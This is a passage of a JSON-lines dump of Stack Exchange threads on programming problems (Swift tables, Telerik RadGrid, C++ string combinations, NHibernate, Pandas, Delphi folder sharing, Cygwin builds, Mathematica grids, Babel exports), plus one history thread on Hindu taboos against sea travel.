tableView(_ tableView: NSTableView, viewFor tableColumn: NSTableColumn?, row: Int) -> NSView? {\n\n let column = tableView.tableColumns.firstIndex(of: tableColumn!)!\n tableColumn?.headerCell.title=header[column];\n\n if let cell = tableView.makeView(withIdentifier: (tableColumn?.identifier)!, owner: self) as? NSTableCellView {\n\n cell.textField?.stringValue = list[row][column]\n cell.textField?.textColor = NSColor.blue\n return cell\n }\n return nil\n }\n\n func tableViewSelectionDidChange(_ notification: Notification) {\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Columns added programmatically to NSTableView not recognised in Delegate","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is there any OnClick event of Telerik RadGrid Command Item?\n\nQuestion: When I add <code>CommandItemDisplay=\"Top\"<\/code> in my Telrik RadGrid <code>MasterTableView<\/code>, I get 1 button <code>AddNewRecordButton<\/code> and 1 LinkButton <code>InitInsertButton<\/code>.\nNow, I would like to do some code on their <code>onclick<\/code> event i.e., Button\/LinkButton enable and disable based on some condition.\nAll I need to do is:\nThere is a RadComboBox (outside of RadGrid) in my Web page and a RadGrid.\nWhen first time page loads, and user forgets to Select Item from RadComboBox\nand clicks on \"Add New\" button of RadGrid\nthen this button should disable at that time and an alert should come (Select item from ComboBox first)\nNow, when user select the item from RadComboBox, \nand then click on \"Add New\" button of RadGrid\nthen it should perform \"add\" functionality \/\/---this part is done\nBelow code (replied by Roman) is working fine to disable the \"Add New\" button and show alert.\nBut how to create this requirement using this code? Where to put this line of code so that it should work as per need. 
Please guide.\nPlease note that I am very new in Telerik controls so if I ask something very basic please forgive and try to guide me in a simple way.\nThanks in advance.\nAnswer: Use <code>RadGrid_ItemCreated()<\/code> event and <code>Attributes.Add()<\/code> method:\n<code>protected void RadGrid1_ItemCreated(object sender, GridItemEventArgs e)\n{\n if (e.Item is GridCommandItem)\n {\n Button btn = (Button)e.Item.FindControl(\"AddNewRecordButton\");\n btn.Attributes.Add(\"onClick\", \"test()\");\n\n LinkButton linkBtn = (LinkButton)e.Item.FindControl(\"InitInsertButton\");\n linkBtn.Attributes.Add(\"onClick\", \"test()\");\n }\n}\n<\/code>\nAnd then add your function to your HTML:\n<code><script type=\"text\/javascript\">\n function test() {\n alert(\"test message\");\n }\n<\/script>\n<\/code>\nComment: Thank you for the reply. when I place the code in `Page_Load()` event, I get this error : **System.IndexOutOfRangeException: Index was outside the bounds of the array**. At Line: **GridCommandItem cmditem = (GridCommandItem)RGGSTAcCode.MasterTableView.GetItems(GridItemType.CommandItem)[0];** . Please reply how to solve it? This is the starting line of my code: `protected void Page_Load(object sender, EventArgs e)\n {\n if (ddlCompany.SelectedItem == null)\n {\n GridCommandItem cmditem = (GridCommandItem)RGGSTAcCode.MasterTableView.GetItems(GridItemType.CommandItem)[0];`\nComment: Thank you so much for the reply. Please check my posted question (from \"All I need to do\") I made an edit in it and explained what I really want to do. Your code is working but I am unable to implement my requirement using your code. Please guide me.\nComment: The only problem you've got is to alert a message when nothing is selected?\nComment: Thankyou for the reply. Yaah can say that. Also, please let me know that if I have to disable the \"Add New\" button , when nothing is selected (including \"first time page load\" or multiple number of times) then where shall I put your code ? I mean inside which event ? And If item is selected then where shall I put the \"else\" condition ?? SO that all should work as per expected.\nComment: Okay, seems `Page_Load()` event is executed too early. Create `RadGrid_DataBound()` event and paste the code to disable the buttons in this event. Then the buttons will be disabled directly after the RadGrid has been databounded. And remove the code from `Page_Load()` event.\nComment: Ok when I put my code under `RadGrid_DataBound()` event, then its working fine on first time page load. But When I place my code under `RadComboBox_SelectedIndexChanged()` event as: `protected void ddlCompany_SelectedIndexChanged(object sender, RadComboBoxSelectedIndexChangedEventArgs e)\n {\n if (ddlCompany.SelectedItem != null)\n {\n foreach (GridDataItem item in RGGSTAcCode.EditItems)\n {\n \/\/Dropdown Bind logic\n }\n }\n else\n {\n \/\/Add New button disable logic\n }\n }`\nComment: Then its not going inside `foreach (GridDataItem item in RGGSTAcCode.EditItems)` statement. Due to this every time it goes inside \"else condition\" and my \"Add New\" button always remain disabled (no matter I am selecting items from RadComBox or not). Please suggest some solution. what is wrong in my code ?\nComment: Let us [continue this discussion in chat](http:\/\/chat.stackoverflow.com\/rooms\/82903\/discussion-between-roman-and-user3196511).\nComment: @user3196511, see my latest chat message\nComment: Thank you for your reply. But I had solved the issue. 
I tried the same code suggested by you in your answer but on `RGGSTAcCode_ItemCommand` event. And its working fine as per my requirement. Thank you so much for the help. Please check the updated solution.\n","meta":{"source":"stackoverflow","title":"Is there any OnClick event of Telerik RadGrid Command Item?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to generate the string sequence in C++\n\nQuestion: I am trying to do the following on my computer but not getting it to perform, like say I have a name of a person and I want to make a different combinations of the letters in his name:\n<code>NAME ABC\n ABC\n \/ | \\\n A B C\n \/|\\ \/ | \\ \/| \\\n AA AB AC BA BB BC CA CB CC \n . . .\n . . .\n<\/code>\nI want to make combinations of the above name, for example:\n<code>ABC A B C AA AB AC BA BB BC CA CB CC.... AAA... BBB... CCC...\n<\/code>\nHow can I do this in C++?\nI wrote the following code for it:\n<code> string c = \"ABC\";\n for (i = 0; i < c.length(); i++)\n c.at(i);\n<\/code>\nBut it only generated <code>A, B, C<\/code>. How do I generate <code>AB, AA, AC, ...<\/code>?\nComment: Consider writing an _algorithm_ in pseudo-code to get a clear understanding _how_ you plan to solve it first. Then you can translate it into C.\nComment: What about `CBA, BAC, etc.`? Or did you just want two-letter combinations? The good news is the code you have is the building block for the rest of the algorithm. You definitely need to write some pseudocode or even draw on paper what you think should happen.\nComment: I don't get it if you are allowing repetition of characters then the number of possible words is infinite.\nComment: check it now its i think clear\nComment: Try a simple permutation algorithm\nAnswer: you can do this\n<code>string c='ABC';\nint n=c.length();\n\nfor(int i=0;i<n;i++)\n{\n std::cout<<c[i]<<\" \";\n\n for(int j=0 ; j< n ;j++)\n {\n std::cout<<c[i]<<c[j]<<\" \";\n }\n}\n<\/code>\nThe output is:\n<code>A AA AB AC B BA BB BC C CA CB CC<\/code>\nIf you want the three letter combinations, add a third for loop inside the second for loop with the same end points like\n<code>for(int k=0;k<n;k++)<\/code> and inside the for loop <code>cout<<c[i]<<c[j]<<c[k]<<\" \"<\/code>\nComment: you are right but i want it general like if i go for 3 combinations or 4 combinations i.e AAA,AAB, AAC or AAAA AAAB AAAC and so on store it in a string\nAnswer: Here's a solution involving lovely recursive templates:\n<code>#include <iostream>\n#include <string>\n\ntemplate <int Depth>\nvoid print_combinations(const std::string& name, const std::string& prefix = \"\")\n{\n for (int i=0; i < name.size(); i++) {\n std::cout << prefix << name[i] << \" \";\n print_combinations<Depth - 1>(name, prefix + name[i]);\n }\n}\n\ntemplate <>\nvoid print_combinations<0>(const std::string&, const std::string&)\n{\n}\n\nint main()\n{\n std::string name = \"ABC\";\n\n print_combinations<4>(name);\n}\n<\/code>\nFor <code>Depth=4<\/code> (as above), it prints\n\nA AA AAA AAAA AAAB AAAC AAB AABA AABB AABC AAC AACA AACB AACC AB ABA ABAA ABAB ABAC ABB ABBA ABBB ABBC ABC ABCA ABCB ABCC AC ACA ACAA ACAB ACAC ACB ACBA ACBB ACBC ACC ACCA ACCB ACCC B BA BAA BAAA BAAB BAAC BAB BABA BABB BABC BAC BACA BACB BACC BB BBA BBAA BBAB BBAC BBB BBBA BBBB BBBC BBC BBCA BBCB BBCC BC BCA BCAA BCAB BCAC BCB BCBA BCBB BCBC BCC BCCA BCCB BCCC C CA CAA CAAA CAAB CAAC CAB CABA CABB CABC CAC CACA CACB CACC CB CBA CBAA CBAB CBAC CBB CBBA CBBB CBBC CBC CBCA CBCB CBCC CC CCA CCAA CCAB CCAC CCB CCBA CCBB CCBC CCC CCCA CCCB 
CCCC\n","meta":{"source":"stackoverflow","title":"how to generate the string sequence in C++","dup_signals":{}},"subset":"stackexchange"} +{"text":"NHibernate EventListeners - getting the value of a property of the entity being saved\n\nQuestion: I'm implementing a custom EventListener to save auditing information in NHibernate.\nI'm currently extending DefaultSaveOrUpdateEventListener, overriding PerformSaveOrUpdate, going through the properties of each entity and saving them elsewhere.\nThis works with simple properties, but fails when cascade-saving a one-to-many relationship.\nIf I take the following entities:\n<code>[ActiveRecord]\npublic class Child\n{\n [PrimaryKey(PrimaryKeyType.GuidComb)]\n public Guid Id { get; set; }\n\n [BelongsTo]\n public Parent Parent { get; set; }\n}\n\n[ActiveRecord]\npublic class Parent\n{\n [PrimaryKey(PrimaryKeyType.GuidComb)]\n public Guid Id { get; set; }\n\n [HasMany(Cascade = ManyRelationCascadeEnum.SaveUpdate)]\n public IList<Child> Children { get; set; }\n}\n<\/code>\nAnd then save a parent with a child:\n<code>ActiveRecordMediator<Parent>.Save(new Parent\n{\n Children = new List<Child>\n {\n new Child()\n }\n});\n<\/code>\nThe child will get the correct parent assigned to it when its persisted to the database but the 'Parent' property of the child is null when my EventListener is called.\nHow can I get the value that will actually be persisted to the database in this case?\n[EDIT] I've recently been looking at getting this to work by hooking the cascade and seeing what else was being saved at the time, but that seems horribly unreliable and I'd much prefer to get the data out of NHibernate so I know it's consistent with the database.\nAnswer: I'm not sure how you can accomplish this with ActiveRecord but it has to do with the mechanism in which NHibernate persists parent\/child relationships.\nSaving the child cascade prior to saving the parent in NHibernate is by design depending on which end of the relationship is marked as \"inverse=true\" and the child needs to have a \"not-null=true\" attribute on the element (which determines which end owns the relationship). This will make it so the Child is managing the state of the relationship.\nThen you can simply save the child, and the parent will be updated with the appropriate information. This will generate one INSERT statement, instead of an INSERT AND UPDATE that you are probably seeing now. Not sure if this solves your problem, but I believe the problem you are having is around this behavior. You can read more at this link:\nhttps:\/\/www.hibernate.org\/hib_docs\/nhibernate\/html\/example-parentchild.html\nComment: Thanks - I'm not sure that solves my actual issue (Child.Parent is still null at the point where my listener is executed) but at least I understand a case where my code doing nasty hacks for cascade saving and I fixed a bug.\nAnswer: I don't use ActiveRecord, I use NHibernate instead so I'm going to assume that they handle parent-child relationships in the same way (https:\/\/www.hibernate.org\/hib_docs\/nhibernate\/html\/example-parentchild.html)\nWhat happens if you leave the ORM to manage the link to the parent (by setting Inverse=true in the HasMany attribute)?\n<code>[ActiveRecord]\npublic class Parent\n{\n [PrimaryKey(PrimaryKeyType.GuidComb)]\n public Guid Id { get; set; }\n\n [HasMany(Cascade = ManyRelationCascadeEnum.SaveUpdate, Inverse=true)]\n public IList<Child> Children { get; set; }\n}\n<\/code>\nComment: Hi Ben. 
Alas, as far as I could tell that makes no difference.\nAnswer: I see that you use Castle ActiveRecord. I was experimenting with it also.\nThere is some weirdness in it, because in the code you provided, the Child object's Parent property will only be set after your stuff is saved to the database. Until then, its value will be null. (I don't know if this behaviour is specific to ActiveRecord, or also NHibernate.)\nPerhaps if you assign the Parent properties of the Child objects by hand, it will work.\n<code>var parent = new Parent();\nvar child = new Child()\n{\n Parent = parent\n};\nparent.Children.Add(child);\n\nActiveRecordMediator<Parent>.Save(child);\nActiveRecordMediator<Parent>.Save(parent);\n<\/code>\nMaybe the order in which you save the entities also has to do something with this matter.\nComment: Yes and no. It works, but it works because NHibernate isn't doing the cascade saving - the developer is doing it. Unfortunately it would mean disabling cascade saving, which is pretty fundamental to a decent ORM. Thanks for the suggestion though.\nComment: Actually, cascade saving works well, but there is the issue that a child doesn't get its parent set, until it is saved. (Or at least that was the case in ActiveRecord last time I tried.)\nYour event listener recieves the children before it happens.\n","meta":{"source":"stackoverflow","title":"NHibernate EventListeners - getting the value of a property of the entity being saved","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pandas -- resolving row merge conflicts by selecting shorter text\n\nQuestion: I have a Pandas dataframe with two columns: String ID (not unique), String text.\nI want to build a dataframe with two columns: String ID (unique), String text.\nTo make my IDs unique, I need to merge all rows with matching IDs.\nHowever, the rows with identical IDs all have different text contents.\nWhen merging, I want the row with the shortest text content to take precedence.\nHow can this be done?\nThank you so much in advance!\nAnswer: You can write your own aggregation function, see more here -\n<code>import pandas as pd\ndf = pd.DataFrame({'id': [1, 2, 1, 2], 'text': ['ab', 'a', 'b', 'aa']})\n\ndef shortest_agg(s):\n lst = s.tolist()\n return sorted(lst, key = lambda x: len(x))[0]\n\ndf.groupby('id').agg(shortest_agg)\n\n#result \ntext\nid\n1 b\n2 a\n<\/code>\n","meta":{"source":"stackoverflow","title":"Pandas -- resolving row merge conflicts by selecting shorter text","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sharing a folder programmatically and revoking it. (Delphi 7)\n\nQuestion: \nHow does one programmatically create a UNC share from a known directory?\nHow does one revoke it programmatically?\n\nI don't want the user to fiddle with the Share dialog. Additional info such as changing the share name, comment, user limit is also welcomed.\nThanks\nSoulBlade\n(Using Delphi 7)\nAnswer: Create the share with NetShareAdd. This will share the directory with a null ACL, which is equavalent to allowing everyone full access. 
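\nFor reference, a rough C sketch of those two calls (names such as MyShare and share_dir are placeholders, error handling is omitted, and a fuller Delphi implementation follows later in this thread):\n<code>#include <windows.h>\n#include <lm.h>   \/* NetShareAdd and NetShareDel; link against Netapi32.lib *\/\n\nNET_API_STATUS share_dir(wchar_t *dir)      \/* full local path of the folder to share *\/\n{\n    SHARE_INFO_2 si = {0};\n    si.shi2_netname  = L\"MyShare\";          \/* placeholder share name *\/\n    si.shi2_type     = STYPE_DISKTREE;\n    si.shi2_remark   = L\"created programmatically\";\n    si.shi2_max_uses = (DWORD)-1;           \/* no user limit *\/\n    si.shi2_path     = dir;\n    return NetShareAdd(NULL, 2, (LPBYTE)&si, NULL);   \/* level 2 carries no ACL: everyone gets full access *\/\n}\n\n\/* revoke it later with: NetShareDel(NULL, L\"MyShare\", 0); *\/\n<\/code>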
\nDelete the share with NetShareDel.\nMadshi's MadSecurity package has a helper which simplifies this down to:\n<code>NewShare(path, shareName, remark);\nShare(shareName).Delete;\n<\/code>\nAnswer: Here's a snippet of code I use with Delphi 2007:\n<code>uses\n AclApi, AccCtrl;\n\ntype\n PShareInfo2 = ^TShareInfo2;\n TShareInfo2 = packed record\n shi2_netname: PWideChar;\n shi2_type: DWORD;\n shi2_remark: PWideChar;\n shi2_permissions: DWORD;\n shi2_max_uses: DWORD;\n shi2_current_uses: DWORD;\n shi2_path: PWideChar;\n shi2_passwd: PWideChar;\n end;\n\nconst\n SECURITY_WORLD_SID_AUTHORITY: TSidIdentifierAuthority = (Value: (0, 0, 0, 0, 0, 1));\n SECURITY_WORLD_RID = ($00000000);\n\n NERR_Success = 0;\n\n advapi = 'advapi32.dll';\n netapi = 'netapi32.dll';\n\nprocedure BuildExplicitAccessWithNameW(pExplicitAccess: PEXPLICIT_ACCESS_W; pTrusteeName: PWideChar;\n AccessPermissions: DWORD; AccessMode: ACCESS_MODE; Ineritance: DWORD); stdcall;\n external advapi name 'BuildExplicitAccessWithNameW';\nfunction GetNamedSecurityInfoW(pObjectName: PWideChar; ObjectType: SE_OBJECT_TYPE; SecurityInfo: SECURITY_INFORMATION;\n ppsidOwner, ppsidGroup: PPSID; ppDacl, ppSacl: PACL; var ppSecurityDescriptor: PSECURITY_DESCRIPTOR): DWORD; stdcall;\n external advapi name 'GetNamedSecurityInfoW';\nfunction NetShareAdd(servername: PWideChar; level: DWORD; buf: Pointer; parm_err: LPDWORD): DWORD; stdcall;\n external netapi;\nfunction NetShareDel(servername, netname: PWideChar; reserved: DWORD): DWORD; stdcall; external netapi;\nfunction SetNamedSecurityInfoW(pObjectName: PWideChar; ObjectType: SE_OBJECT_TYPE; SecurityInfo: SECURITY_INFORMATION;\n ppsidOwner, ppsidGroup: PPSID; ppDacl, ppSacl: PACL): DWORD; stdcall; external advapi name 'SetNamedSecurityInfoW';\n\nprocedure NetApiCheck(RetValue: Cardinal);\nbegin\n if RetValue <> ERROR_SUCCESS then\n RaiseLastOSError(RetValue);\nend;\n\nfunction WideGetEveryoneName: WideString;\nvar\n psid: PSECURITY_DESCRIPTOR;\n Dummy: WideString;\n NameLen, DomainNameLen: Cardinal;\n Use: SID_NAME_USE;\nbegin\n Result := '';\n\n if not AllocateAndInitializeSid(SECURITY_WORLD_SID_AUTHORITY, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, psid) then\n Exit;\n try\n NameLen := 0;\n DomainNameLen := 0;\n Use := 0;\n if LookupAccountSidW(nil, psid, nil, NameLen, nil, DomainNameLen, Use) or\n (GetLastError <> ERROR_INSUFFICIENT_BUFFER) then\n Exit;\n\n if NameLen = 1 then\n Exit;\n\n SetLength(Result, NameLen - 1);\n SetLength(Dummy, DomainNameLen);\n\n if not LookupAccountSidW(nil, psid, PWideChar(Result), NameLen, PWideChar(Dummy), DomainNameLen, Use) then\n Result := '';\n finally\n FreeSid(psid);\n end;\nend;\n\nfunction WideDeleteShare(const ShareName: WideString): Boolean;\nbegin\n Result := NetShareDel(nil, PWideChar(ShareName), 0) = NERR_Success;\nend;\n\nprocedure WideShareDirectory(const Directory, ShareName, Description: WideString; ReadOnly: Boolean);\nvar\n ShareInfo: TShareInfo2;\n OldAcl, NewAcl: PACL;\n psid: PSECURITY_DESCRIPTOR;\n ExplicitAccess: EXPLICIT_ACCESS_W;\nbegin\n FillChar(ShareInfo, SizeOf(ShareInfo), 0);\n ShareInfo.shi2_netname := PWideChar(ShareName);\n ShareInfo.shi2_type := STYPE_DISKTREE;\n ShareInfo.shi2_remark := PWideChar(Description);\n ShareInfo.shi2_max_uses := SHI_USES_UNLIMITED;\n ShareInfo.shi2_path := PWideChar(Directory);\n NetApiCheck(NetShareAdd(nil, 2, @ShareInfo, nil));\n \/\/ Full Control to Everyone is granted by default\n if not ReadOnly then\n Exit;\n\n NetApiCheck(GetNamedSecurityInfoW(PWideChar(ShareName), SE_LMSHARE, 
DACL_SECURITY_INFORMATION, nil, nil, @OldAcl, nil,\n psid));\n try\n FillChar(ExplicitAccess, SizeOf(ExplicitAccess), 0);\n BuildExplicitAccessWithNameW(@ExplicitAccess, PWideChar(WideGetEveryoneName),\n GENERIC_READ or STANDARD_RIGHTS_READ or SPECIFIC_RIGHTS_ALL, SET_ACCESS, NO_INHERITANCE);\n NetApiCheck(SetEntriesInAclW(1, @ExplicitAccess, OldAcl, NewAcl));\n try\n NetApiCheck(SetNamedSecurityInfoW(PWideChar(ShareName), SE_LMSHARE, DACL_SECURITY_INFORMATION, nil, nil, NewAcl,\n nil));\n finally\n LocalFree(HLOCAL(NewAcl));\n end;\n finally\n LocalFree(HLOCAL(psid));\n end;\nend;\n<\/code>\nYou can specify the user limit in <code>TShareInfo2.shi2_max_uses<\/code> (my procedure always creates an unlimited share).\n","meta":{"source":"stackoverflow","title":"Sharing a folder programmatically and revoking it. (Delphi 7)","dup_signals":{}},"subset":"stackexchange"} +{"text":"When did Hinduism forbid overseas travel?\n\nQuestion: Reading a comment made on this site, I saw something very curious:\n\nWhy not blame it on the ancient Hindu belief that traveling overseas pollutes a person irredeemably, thereby stunting the growth of Indian naval technology and ensuring Europeans came to India rather than vice versa?\n\nSearching on Google, I find quite a few people debating whether there are current rules against overseas travel, or what the penalties are, but I haven't been able to find anything about this belief in ancient days.\nI know that Hinduism did spread to Indonesia at one point, so I imagine there was no prohibition against overseas travel in those days. So, to be more specific:\nWhen did Hinduism first prohibit overseas travel, and when did it stop prohibiting overseas travel?\nComment: Googling for this (as I did) came up with a number of conflicting claims on this point, so it seems like a legitimate question to ask here.\nComment: If you cite the conflicting claims, you prove that you've done the research, and help us to deconflict and resolve the claims.\nComment: It seems to me that the beliefs of Indians during the Iron Age are *quite* on topic here. I'm confused why this would be held as off-topic.\nComment: Putting this question on hold for insufficient research *does* seem reasonable, though. (@MarkC.Wallace)\nComment: Most of the questions related to Indian culture and hinduism are offtopic here, why is it so? Are religions not a part of history?\nComment: @AskingStory, that would be a good question for you to ask on meta.history.se, though I would disagree with your observation.\nComment: I think the Achaemenids, but maybe the Parthians, had an aversion to water based trade as impure. So it may have very old, Indo Aryan roots.\nAnswer: According to this article in Hinduism Today (July\/August\/September 2008), samudrayana (ocean voyage) is forbidden in the Shastras, but it may not be binding on current followers -- instead they may go through ritual purification after travel. The relevant passage is below:\n\nThe Baudhayana Sutra, one of the Hindu Dharma Shastras, says that\n \"making voyages by sea\" (II.1.2.2) is an offense which will cause\n pataniya, loss of caste. It offers a rather difficult penance: \"They\n shall eat every fourth mealtime a little food, bathe at the time of\n the three libations (morning, noon and evening), passing the day\n standing and the night sitting. After the lapse of three years, they\n throw off their guilt.\"\nComment: @PieterGeerkens There are four castes (varnas). Untouchable is the state you enter when you lose your caste. 
Sometimes it is referred to as the fifth caste, but it is not technically so. So, in this case, loss of caste is not something anyone would want--though technically I suppose it would have no effect on someone who is already an untouchable.\nComment: @called2voyage: Thank you for the explanation.\nComment: How did Ghandi purify himself after traveling to England?\nComment: @RonJohn [Mahatma Gandhi was from the merchant \/ Baniya caste](https:\/\/en.wikipedia.org\/wiki\/Mahatma_Gandhi) so, as Pradeep explains below this would not apply to him as it mainly focuses on higher caste people.\nComment: *Loss of caste*; for many (such as untouchables), wouldn't that be an *incentive* rather than a *disincentive* to take a sea voyage?\nAnswer: The term in Sanskrit \"Sagara Ullanghana\" or \"Samudra Ullanghana\" is the term mainly used to prohibit upper caste i.e. Brahmins who have learnt Vedas and do daily 'Pujas' and 'Sandhyavandanam' from crossing the sea or ocean. This article Hindus and Ocean Taboo gives the complete picture of it and also what a Brahmin says about \"making voyages by sea\".\nBaudhayana Dharma and Grahya Shastra and Manu Smriti extensively mentions castes and imposes strict rules to be followed by those castes. But most of them concentrate on Brahmins and their Do's and Don'ts. But samudrayana was allowed to other castes because since Vedic period people from India have traveled across the world for trade. And another example is Hindu culture in Indonesia.\nAnswer: Samudrayana, overseas travel, has always been forbidden to an observant Hindu because it would necessarily involve coming into contact with a non Hindu, which is an uncleansable defilement. In itself, there is nothing wrong with travel, but to have contact with foreigners, with the Dasyu, and their food is a fundamental violation of Hindu Brama, purity of being.\nIn Hinduism, everything is gradation. Thus, a Brahman who defiles himself by martial activities becomes a Ksatriya, which in itself has its own honors, or perhaps something worse. The more defilement you bring upon yourself, the deeper your dishonor and degradation. This is what is meant by \"loss of caste\". Conversely, by right and pure conduct a person may ascend and become higher in grade, even a Brahman.\nTo have regular contact with unbelieving foreigners, the Dasyu, is considered to be so defiling that there is no coming back in one lifetime.\nAnswer: Raja Ram Mohan Roy was the first hindu Brahmin who ignored the old rule of ocean travelling prohibition... on 15th November 1830.\nComment: Do you have a source for this? Can you say a bit more about the circumstances (e.g. why he ignored it)?\n","meta":{"source":"history.stackexchange","title":"When did Hinduism forbid overseas travel?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to compile ioping with cygwin\n\nQuestion: Using Cygwin on Windows 7 x64. Extracted 'ioping' source into '\/home'\nThis is the result:\n<code>$ make\ntest ! -d .git || git describe --tags --dirty=+ | sed 's\/^v\/\/;s\/-\/.\/g' > version\ncc -std=gnu99 -g -Wall -Wextra -pedantic -DVERSION=\\\"0.8\\\" -c -o ioping.o ioping.c\nioping.c: In function 'get_device_size':\nioping.c:602:3: error: #error no get disk size method\n # error no get disk size method\n ^\nMakefile:46: recipe for target 'ioping.o' failed\nmake: *** [ioping.o] Error 1\n<\/code>\nTrying to compile a Windows executable. I'm new to Cygwin. 
Seems like a preprocessor is missing when looking at the code.\nSource: https:\/\/github.com\/koct9i\/ioping\nEdit:\nSee accepted asnwer user, 'user3629249' and my comments for full answer.\nNote of the linked source. 'Readme' says it works on windows, Tried running it on Win 7 Ultimate 64-bit with SSD and it errors out with \"preparation write failed: no error\".\nComment: you really should NOT have placed the ioping project files in your `home` directory. rather, create a sub directory. Then place the project files in that sub directory.\nComment: I was terse for simplicity at the time, but I actually put it in it's own dir, just didn't show it above, just wanted to point out what seemed like was the most relevant base dir. But yes for posterity, it should be located in a sub dir for organizational reason. Some may see as nitpicking, but a good point none the less.\nAnswer: the function: <code>get_device_size()<\/code> selects certain `ioctl() depending on the underlying OS. \nwhich <code>ioctl()<\/code> depends on which of the following are defined at <code>make<\/code> time\n\n<code>__linux__<\/code>\n<code>__gnu_hurd__<\/code>\n<code>__FreeBSD__<\/code>\n<code>__FreeBSD_kernel__<\/code>\n<code>__DragonFly__<\/code>\n<code>__OpenBSD__<\/code>\n<code>__APPLE__<\/code>\n<code>__sun__<\/code>\n<code>__MINGW32__<\/code>\n\nBrowse your environment variables\nI would expect some environment variable like <code>__cygwin__<\/code>\nWhich ever environment variable seems most likely to be the appropriate one, add the name of the environment variable to the sets of preprocessor blocks near the top of the <code>ioping.c<\/code> file and again in the <code>get_device_size()<\/code> function.\nComment: Simplest solution for me was installing standalone 'MinGW'. From what I read it would have taken some work to get it working with Cygwin(Didn't want to take chance of messing up Cygwin environment settings as I use it for other things) Thanks for the attempt.\nComment: the utility `MinGW` is for windows, not a unix like environment. The only changes would be within the oping.c file not in the cygwin environment. however, if you do not want to change the *.c file, then in your .bashrc file add statements similar to `set __linux__ ` and `export __linux__`\n","meta":{"source":"stackoverflow","title":"How to compile ioping with cygwin","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to build this grid with less code?\n\nQuestion: I have the diagonal and both upper and lower triangulars of a grid.\n<code>diag = {1, 2, 3, 4};\nupper = {{u12, u13, u14}, {u23, u24}, {u34}};\nlower = {{l21}, {l31, l32}, {l41, l42, l43}};\n<\/code>\nI want to combine this and display them in a grid with shading. My code for this is very bulky and I can't help feeling I've missed some function that would make more compact and easier to read. 
I also would rather not convert everything into <code>Item<\/code> to get the shading I want.\n<code>diag = Item[#, Background -> LightGray] & \/@ diag;\nupper = Map[Item[#, Background -> LightBlue] &, upper, {2}];\nlower = Map[Item[#, Background -> LightGreen] &, lower, {2}];\nfirst = Append[{diag[[1]]}, upper[[1]]] \/\/ Flatten;\nmid = Table[Append[{diag[[row]]}] \/* Append[upper[[row]]] \/* Flatten@\n lower[[row - 1]], {row, 2, 3}];\nlast = Append[lower[[3]], {diag[[4]]}] \/\/ Flatten;\nGrid[Partition[{first, mid, last} \/\/ Flatten, 4]]\n<\/code>\n\nIs there a more compact way to do this?\nAnswer: <code>(*Some pre-format, starting with your element definitions *)\ndiag = List \/@ diag;\nupper = Join[upper, {{}}];\nlower = Join[{{}}, lower];\n\n(*code *)\nf[els_, col_] := Map[Item[#, Background -> col] &, els, {2}]; \nGrid@MapThread[Join, {f[lower, LightBlue], f[diag, LightGray], f[upper, LightRed]}]\n<\/code>\nComment: I like the combination method you have used. Sneaky to add an empty row and and nest the diagonal.\nAnswer: Generally speaking I favour using <code>Grid<\/code> options for styling rather than using <code>Item<\/code>. For example make your matrix:\n<code>MatrixForm[m = Array[Subscript[a, ##] &, {4, 4}]];\n<\/code>\nthen:\n<code>Grid[m,\n ItemStyle -> {None, None, Flatten@MapIndexed[Which[\n #2[[2]] > #2[[1]], #2 -> Blue,\n #2[[2]] == #2[[1]], #2 -> Gray,\n #2[[2]] < #2[[1]], #2 -> Red\n ] &, m, {2}]}\n ]\n<\/code>\n\nDid you start with a matrix and then split it into upper, lower and diagonals? And if you did was that solely for the purpose of styling? If you did then just revert to your starting matrix. If somehow you actually only have the 3 components of the matrix then combine them simply like this:\n<code>m = RotateLeft@PadLeft[upper, {4, 4}] + \n RotateRight@PadRight[lower, {4, 4}] + DiagonalMatrix[diag];\n<\/code>\nOr, as per @wreach answer, use negative indexes rather than wrapping to do the rotating:\n<code>m = PadLeft[upper, {-4, 4}] + PadRight[lower, {-4, 4}] + DiagonalMatrix[diag];\n<\/code>\nThen use the grid styling as before:\n<code>Grid[m, Background -> {None, None, \n Flatten@MapIndexed[\n Which[#2[[2]] > #2[[1]], #2 -> Blue, #2[[2]] == #2[[1]], #2 -> \n Gray, #2[[2]] < #2[[1]], #2 -> Red] &, m, {2}]}]\n<\/code>\nComment: You aren't starting from the stated input. Was that on purpose?\nComment: wanted to simply address using `MapIndexed` rather than `Item` for styling of `Grid` but will update\nComment: Ah, using rules. Nice. I didn't realise the was possible but of course with `MapIndexed`.\nComment: @Edmund I find it more intuitive doing it that way but it is up to individual preference\nAnswer: A helper function can reduce the boilerplate somewhat:\n<code>a_ \/\/ itemize[c_] := Map[Item[#, Background -> c]&, a, {-1}]\n\nDiagonalMatrix[diag \/\/ itemize[LightGray]] +\nPadLeft[upper \/\/ itemize[LightBlue], {-4,4}] +\nPadRight[lower \/\/ itemize[LightGreen], {-4,4}] \/\/\nGrid\n<\/code>\nComment: +1 nice use of negative indexes to avoid rotating functions\nComment: @MikeHoneychurch I abandoned my first solution because your post got there first. Now I see that my second solution is much like your edit. Oh well, them's the MSE breaks. :)\nComment: I like your answer ...although I've never liked using `Item` :)\nComment: This combination is sweet. 
I looked at the padding functions but was trying to figure out how to do what you have done with the -4.\n","meta":{"source":"mathematica.stackexchange","title":"How to build this grid with less code?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Babel generated code causes error exports is undefined\n\nQuestion: When this code (generated from babel) runs I get an error <code>exports is undefined<\/code>\n<code>Object.defineProperty(exports, '__esModule', {\n<\/code>\nany ideas?\nAnswer: You are most likely not executing the code in an environment that supports CommonJS modules. You could use a bundler, such as Browserify or webpack\nto bundle your modules into something that can be run in different environments.\nOr you could choose a different module transformer.\n\nWith webpack\nRun <code>npm install -g webpack; npm install -D babel-loader<\/code>. Then with this webpack configuration:\n<code>\/\/ webpack.config.js\nmodule.exports = {\n entry: \".\/path\/to\/entry\/module.js\",\n output: {\n path: __dirname,\n filename: \"bundle.js\"\n },\n module: {\n loaders: [\n { test: \/\\.js$\/, exclude: \/node_modules\/, loader: \"babel-loader\"}\n ]\n }\n};\n<\/code>\nrunning the <code>webpack<\/code> command will convert all <code>*.js<\/code> files reachable via the entry file with babel and bundle them together into <code>bundle.js<\/code>.\nComment: Well, I would start with 